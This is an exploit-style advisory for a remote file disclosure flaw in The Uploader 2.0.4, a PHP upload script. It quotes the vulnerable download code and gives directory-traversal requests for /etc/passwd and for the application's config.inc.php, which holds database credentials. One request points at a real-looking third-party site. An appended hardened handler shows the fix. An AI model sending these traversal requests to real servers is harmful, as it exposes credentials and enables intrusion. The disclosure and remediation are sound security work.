The Uploader version 2.0.4 suffers from a remote file disclosure vulnerability.
=================================================
The Uploader 2.0.4 Remote File disclosure Vulnerability
=================================================
==============================================
# Script Name : The Uploader
# Version : [2.0.4]
# Language : php
# Author : Xa7m3d (H4K@hotmail.ch)
# Download : https://sourceforge.net/projects/theuploader
# Tested on : ubuntu 9.10
==============================================
File Disclosure :
in : api/download_launch.php
The filename parameter is taken straight from the query string and appended to $main['upload_directory'] with no sanitisation, so "../" sequences walk out of the upload directory and the script streams back any file the web server account can read.
#######################################
$open=fopen($main['upload_directory'] . $_GET['filename'], "r"); <--(+)
$size=filesize($main['upload_directory'] . $_GET['filename']);
$read=fread($open, $size);
header("Content-Type: application/octet-stream");
header("Content-Length: " . $size);
header("Content-Transfer-Encoding: binary");
header("Content-Disposition: attachment; filename=" . $_GET['filename']); <--(+)
#######################################
Exploit :
api/download_launch.php?filename=../../../../../etc/passwd
(The file is returned only if the PHP process can read it and no open_basedir restriction is in place; the web application's own config.inc.php, one directory up from api/, is the more useful target since it holds the database credentials.)
Example :
https://www.busut.it/theuploader/api/download_launch.php?filename=../config.inc.php
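A hardened version of the download handler, added here as an example and not code from The Uploader project or its author. It assumes $main['upload_directory'] is configured the same way the vulnerable snippet uses it (a directory path with a trailing slash); the name restrictions and the realpath() containment check are the added defences.

```php
<?php
// Hardened replacement for api/download_launch.php (added example, not the
// project's own code). Assumes $main['upload_directory'] is set as in the
// original snippet, i.e. the directory uploaded files are written to.

$upload_dir = realpath($main['upload_directory']);
if ($upload_dir === false) {
    header('HTTP/1.1 500 Internal Server Error');
    exit('upload directory not available');
}

// basename() drops every directory component: "../../../../../etc/passwd"
// becomes "passwd" and "../config.inc.php" becomes "config.inc.php". That
// alone is not enough (a plain name can still point at a file inside the
// upload directory that must not be served, such as a dotfile), so the name
// is also restricted to a safe character set and may not start with a dot.
$filename = isset($_GET['filename']) ? basename((string) $_GET['filename']) : '';
if ($filename === '' || $filename[0] === '.' || !preg_match('/^[A-Za-z0-9._-]+$/', $filename)) {
    header('HTTP/1.1 400 Bad Request');
    exit('invalid filename');
}

// Resolve the final path and confirm it is still inside the upload directory.
// realpath() collapses ".." and follows symlinks, and returns false for a
// missing file, so a symlink planted in the upload directory that points at
// /etc/passwd or ../config.inc.php is rejected as well.
$path = realpath($upload_dir . DIRECTORY_SEPARATOR . $filename);
if ($path === false
    || strpos($path, $upload_dir . DIRECTORY_SEPARATOR) !== 0
    || !is_file($path)) {
    header('HTTP/1.1 404 Not Found');
    exit('file not found');
}

header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($path));
header('Content-Transfer-Encoding: binary');
// The validated name is quoted so it cannot carry extra header parameters.
header('Content-Disposition: attachment; filename="' . $filename . '"');
readfile($path);
```

With this in place the traversal request above gets a 404 (the name collapses to "passwd", which does not exist in the upload directory), and a request for config.inc.php is only honoured if a file of that name was actually uploaded into the directory, never the application's own config file one level up.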
T3AM Piracy Unlimited Tunisia : # Cyb3R H3LL # k[i]ng # La Haft Xroy #